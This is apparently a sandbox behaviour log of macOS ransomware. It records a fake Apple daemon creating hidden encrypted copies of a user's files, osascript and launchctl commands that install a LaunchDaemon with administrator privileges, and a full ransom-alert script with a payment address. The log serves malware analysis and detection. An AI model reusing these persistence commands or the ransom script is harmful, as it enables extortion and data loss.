              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/index.spotlightV3/.0.indexIds.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/index.spotlightV3/.live.0.directoryStoreFile.shadow.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/index.spotlightV3/.live.0.indexHead.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/index.spotlightV3/.live.0.indexUpdates.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/index.spotlightV3/.0.indexUpdates.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/index.spotlightV3/.live.0.indexPositionTable.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/index.spotlightV3/.0.indexGroups.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/index.spotlightV3/.live.0.shadowIndexPositionTable.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/index.spotlightV3/.live.0.indexPositions.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/index.spotlightV3/.live.0.indexBigDates.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/index.spotlightV3/.0.indexPositions.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/index.spotlightV3/.live.0.shadowIndexDirectory.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/index.spotlightV3/.indexState.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/index.spotlightV3/.live.0.indexGroups.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/index.spotlightV3/.live.0.directoryStoreFile.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/index.spotlightV3/.0.indexHead.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/index.spotlightV3/.live.0.shadowIndexGroups.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/index.spotlightV3/.live.0.shadowIndexHead.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/index.spotlightV3/.live.0.indexArrays.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/index.spotlightV3/.0.indexDirectory.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/index.spotlightV3/.0.indexArrays.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/index.spotlightV3/.live.0.indexDirectory.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/index.spotlightV3/.live.0.shadowIndexTermIds.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/index.spotlightV3/.0.indexBigDates.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/index.spotlightV3/.tmp.spotlight.state.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/index.spotlightV3/.live.0.shadowIndexArrays.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/index.spotlightV3/.store.db.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/index.spotlightV3/.live.0.indexIds.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/index.spotlightV3/.live.0.shadowIndexCompactDirectory.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/index.spotlightV3/.0.shadowIndexGroups.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/index.spotlightV3/.store.updates.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/index.spotlightV3/.live.0.indexTermIds.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/index.spotlightV3/.live.0.indexPostings.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/index.spotlightV3/.0.indexCompactDirectory.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/GeoServices/Resources/.cemetery-15.png.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/GeoServices/Resources/.LandCoverGradient9-1.png.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/GeoServices/Resources/.night-cemetery-2.png.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/GeoServices/Resources/.water-16.png.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/GeoServices/Resources/.water-16@2x.png.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/GeoServices/Resources/.night-DetailedLandCoverSand-1.png.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/GeoServices/Resources/.venues-ceiling-2.png.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/GeoServices/Resources/.no_data-2.png.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/GeoServices/Resources/.sand-1@2x.png.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/GeoServices/Resources/.concrete-17.png.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/GeoServices/Resources/.park-16.png.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/GeoServices/Resources/.altitude-783.xml.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/GeoServices/Resources/.night-water-2.png.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/GeoServices/Resources/.LandCoverGradient9-1@2x.png.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/GeoServices/Resources/.LandCoverGradient8-1@2x.png.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/GeoServices/Resources/.RealisticRoadLocalRoad-1@2x.png.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/GeoServices/Resources/.concrete-17@2x.png.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/GeoServices/Resources/.cemetery-15@2x.png.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/GeoServices/Resources/.land-carplay-1.png.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/GeoServices/Resources/.DetailedLandCoverPavedArea-1@2x.png.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/GeoServices/Resources/.LandCoverGradient8-1.png.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/GeoServices/Resources/.park-16@2x.png.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/GeoServices/Resources/.tomtom-mask-2.png.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/GeoServices/Resources/.road-noise-light-1@2x.png.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/GeoServices/Resources/.land-carplay-1@2x.png.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/GeoServices/Resources/.white-1@2x.png.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/GeoServices/Resources/.SFShieldsSemicondensed-Bold-1.otf.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/GeoServices/Resources/.road-noise-light-1.png.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/GeoServices/Resources/.night-RealisticRoadLocalRoad-1@2x.png.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/GeoServices/Resources/.night-DetailedLandCoverPavedArea-2.png.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/GeoServices/Resources/.sand-1.png.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/GeoServices/Resources/.LandCoverGradient16-1@2x.png.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/GeoServices/Resources/.SFDisplayShields-CompressedBold-1.otf.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/GeoServices/Resources/.golf_course-15@2x.png.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/GeoServices/Resources/.no_data-2@2x.png.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/GeoServices/Resources/.road-noise-1@2x.png.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/GeoServices/Resources/.transparent-1.png.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/GeoServices/Resources/.RealisticRoadHighway-1@2x.png.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/GeoServices/Resources/.night-golf_course-2.png.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/GeoServices/Resources/.LandCoverGradient1-1@2x.png.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/GeoServices/Resources/.night-park-2.png.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/GeoServices/Resources/.RealisticRoadHighway-1.png.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/GeoServices/Resources/.night-RealisticRoadLocalRoad-1.png.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/GeoServices/Resources/.night-land-2@2x.png.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/GeoServices/Resources/.SFShieldsCondensed-Bold-1.otf.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/GeoServices/Resources/.night-land-carplay-1@2x.png.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/GeoServices/Resources/.night-park-2@2x.png.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/GeoServices/Resources/.LandCoverGradient16-1.png.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/GeoServices/Resources/.DetailedLandCoverPavedArea-1.png.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/GeoServices/Resources/.clut-night-2.png.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/GeoServices/Resources/.night-water-2@2x.png.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/GeoServices/Resources/.golf_course-15.png.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/GeoServices/Resources/.white-1.png.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/GeoServices/Resources/.land-18.png.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/GeoServices/Resources/.night-RealisticRoadHighway-1@2x.png.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/GeoServices/Resources/.LandCoverGradient1-1.png.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/GeoServices/Resources/.night-golf_course-2@2x.png.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/GeoServices/Resources/.night-concrete-1@2x.png.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/GeoServices/Resources/.transparent-1@2x.png.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/GeoServices/Resources/.night-DetailedLandCoverPavedArea-2@2x.png.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/GeoServices/Resources/.road-noise-2.png.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/GeoServices/Resources/.venues-ceiling-1@2x.png.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/GeoServices/Resources/.night-concrete-1.png.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/GeoServices/Resources/.RealisticRoadLocalRoad-1.png.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/GeoServices/Resources/.land-19@2x.png.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/GeoServices/Resources/.night-DetailedLandCoverSand-1@2x.png.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/GeoServices/Resources/.tomtom-mask-3@2x.png.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/GeoServices/Resources/.night-land-carplay-1.png.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/GeoServices/Resources/.night-RealisticRoadHighway-1.png.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/GeoServices/Resources/.night-cemetery-2@2x.png.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/GeoServices/Resources/.night-land-2.png.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.CommerceKit.TransactionService/fsCachedData/.D6CDD17E-8891-473B-B10C-1BC3383751DC.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.metadata.SpotlightNetHelper/fsCachedData/.B540A475-1C33-40AC-A693-D339979E9B4F.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.metadata.SpotlightNetHelper/fsCachedData/.78DDB1D7-21C3-46B6-8E0D-E46E2CA66F99.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.metadata.SpotlightNetHelper/fsCachedData/.03D306B2-A372-4238-AFDF-E1B96A316589.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.metadata.SpotlightNetHelper/fsCachedData/.7AC7FE0E-2290-4EEA-9369-AD0A7A43E5A4.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.metadata.SpotlightNetHelper/fsCachedData/.0718DFF3-0531-4720-90C1-2FA705FAF1A3.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.metadata.SpotlightNetHelper/fsCachedData/.2533956C-5975-42C3-8338-F13B1A221764.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.metadata.SpotlightNetHelper/fsCachedData/.453A02FD-E517-4B1B-AAA1-B95EA848D875.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.metadata.SpotlightNetHelper/fsCachedData/.AC93C472-62D7-40C8-A79A-FA239544A339.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.metadata.SpotlightNetHelper/fsCachedData/.3CA00E54-DC41-4A98-85C0-35FB5E3EF2FF.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.metadata.SpotlightNetHelper/fsCachedData/.230B1408-8FDF-4376-81B0-D5F9F40259EB.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.metadata.SpotlightNetHelper/fsCachedData/.C9584DE6-6DA3-4F28-AD17-5E52C5BB8704.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.metadata.SpotlightNetHelper/fsCachedData/.1C49D6A7-429F-4AFA-A237-D190DE250568.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.parsecd/Cohorts/.cohorts.sqlite.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.parsecd/Cohorts/.cohorts.sqlite-shm.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.parsecd/Cohorts/.cohorts.sqlite-wal.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Pictures/Photos Library.photoslibrary/private/com.apple.photoanalysisd/VisionService/.AlgoFaceClusterCache.data.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Pictures/Photos Library.photoslibrary/private/com.apple.mediaanalysisd/MediaAnalysis/.mediaanalysis.db.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Pictures/Photos Library.photoslibrary/private/com.apple.mediaanalysisd/MediaAnalysis/.mediaanalysis.db-wal.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Pictures/Photos Library.photoslibrary/private/com.apple.mediaanalysisd/MediaAnalysis/.mediaanalysis.db-shm.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Application Support/Adobe/Acrobat/DC/.IconCacheRdr65536.dat.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Group Containers/group.com.apple.notes/Library/Preferences/.group.com.apple.notes.plist.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/Generated/com.apple.VoiceMemos.help*2.0/.en_GB.cshelpindex.e
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Hidden File created: /Users/ben/Library/Caches/com.apple.helpd/Generated/com.apple.AppStore.help*3.0/.en_GB.cshelpindex.e
              Source: /bin/sh (PID: 763)Osascript command executed: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
              Source: /bin/sh (PID: 769)Osascript command executed: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
              Source: /bin/sh (PID: 773)Osascript command executed: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
              Source: /bin/sh (PID: 777)Osascript command executed: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
              Source: /bin/sh (PID: 797)Osascript command executed: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
              Source: /bin/sh (PID: 801)Osascript command executed: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
              Source: /bin/sh (PID: 806)Osascript command executed: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
              Source: /bin/sh (PID: 822)Osascript command executed: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
              Source: /bin/sh (PID: 835)Osascript command executed: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
              Source: /bin/sh (PID: 839)Osascript command executed: osascript -e beep 18say 'Your files are encrypted' waiting until completion falseset alTitle to 'Many of your important documents, photos, videos, images and other files are no longer accessible because they have been encrypted.Maybe you are busy looking for a way to recover your files, but do not waste your time. Nobody can recover your files without our decryption service.We guarantee however that you can recover your files safely and easily and this will cost you 50 USD without any additional fees.Our offer is valid FOR 3 DAYS (starting now!). Full details can be found in the file: READ_ME_NOW.txt located on your Desktop'set alText to 'Your files are encrypted'display alert alText message alTitle as critical buttons {'OK'}set the clipboard to '13roGMpWd7Pb3ZoJyce8eoQpfegQvGHHK7'
              Source: /bin/sh (PID: 781)Osascript command executed: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
              Source: /bin/sh (PID: 785)Osascript command executed: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
              Source: /bin/sh (PID: 789)Osascript command executed: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
              Source: /bin/sh (PID: 793)Osascript command executed: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
              Source: /bin/sh (PID: 805)Osascript command executed: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
              Source: /bin/sh (PID: 813)Osascript command executed: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
              Source: /bin/sh (PID: 831)Osascript command executed: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
              Source: /bin/sh (PID: 851)Osascript command executed: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
              Source: /bin/sh (PID: 855)Osascript command executed: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
              Source: /bin/sh (PID: 859)Osascript command executed: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
              Source: /bin/sh (PID: 863)Osascript command executed: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
              Source: /bin/sh (PID: 867)Osascript command executed: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
              Source: /Library/mixednkey/toolroomd (PID: 756)Shell command executed: sh -c osascript -e 'do shell script \'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd\' with administrator privileges'
              Source: /Library/mixednkey/toolroomd (PID: 756)Shell command executed: sh -c osascript -e 'do shell script \'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd\' with administrator privileges'
              Source: /Library/mixednkey/toolroomd (PID: 756)Shell command executed: sh -c osascript -e 'beep 18say \'Your files are encrypted\' waiting until completion falseset alTitle to \'Many of your important documents, photos, videos, images and other files are no longer accessible because they have been encrypted.Maybe you are busy looking for a way to recover your files, but do not waste your time. Nobody can recover your files without our decryption service.We guarantee however that you can recover your files safely and easily and this will cost you 50 USD without any additional fees.Our offer is valid FOR 3 DAYS (starting now!). Full details can be found in the file: READ_ME_NOW.txt located on your Desktop\'set alText to \'Your files are encrypted\'display alert alText message alTitle as critical buttons {\'OK\'}set the clipboard to \'13roGMpWd7Pb3ZoJyce8eoQpfegQvGHHK7\''
              Source: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid (PID: 764)Shell command executed: /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
              Source: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid (PID: 770)Shell command executed: /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
              Source: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid (PID: 774)Shell command executed: /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
              Source: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid (PID: 778)Shell command executed: /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
              Source: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid (PID: 798)Shell command executed: /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
              Source: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid (PID: 802)Shell command executed: /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
              Source: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid (PID: 808)Shell command executed: /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
              Source: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid (PID: 823)Shell command executed: /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
              Source: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid (PID: 836)Shell command executed: /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Shell command executed: sh -c osascript -e 'do shell script \'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd\' with administrator privileges'
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Shell command executed: sh -c osascript -e 'do shell script \'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd\' with administrator privileges'
              Source: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid (PID: 782)Shell command executed: /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
              Source: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid (PID: 786)Shell command executed: /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
              Source: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid (PID: 790)Shell command executed: /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
              Source: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid (PID: 794)Shell command executed: /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
              Source: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid (PID: 807)Shell command executed: /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
              Source: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid (PID: 814)Shell command executed: /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
              Source: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid (PID: 832)Shell command executed: /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
              Source: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid (PID: 852)Shell command executed: /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
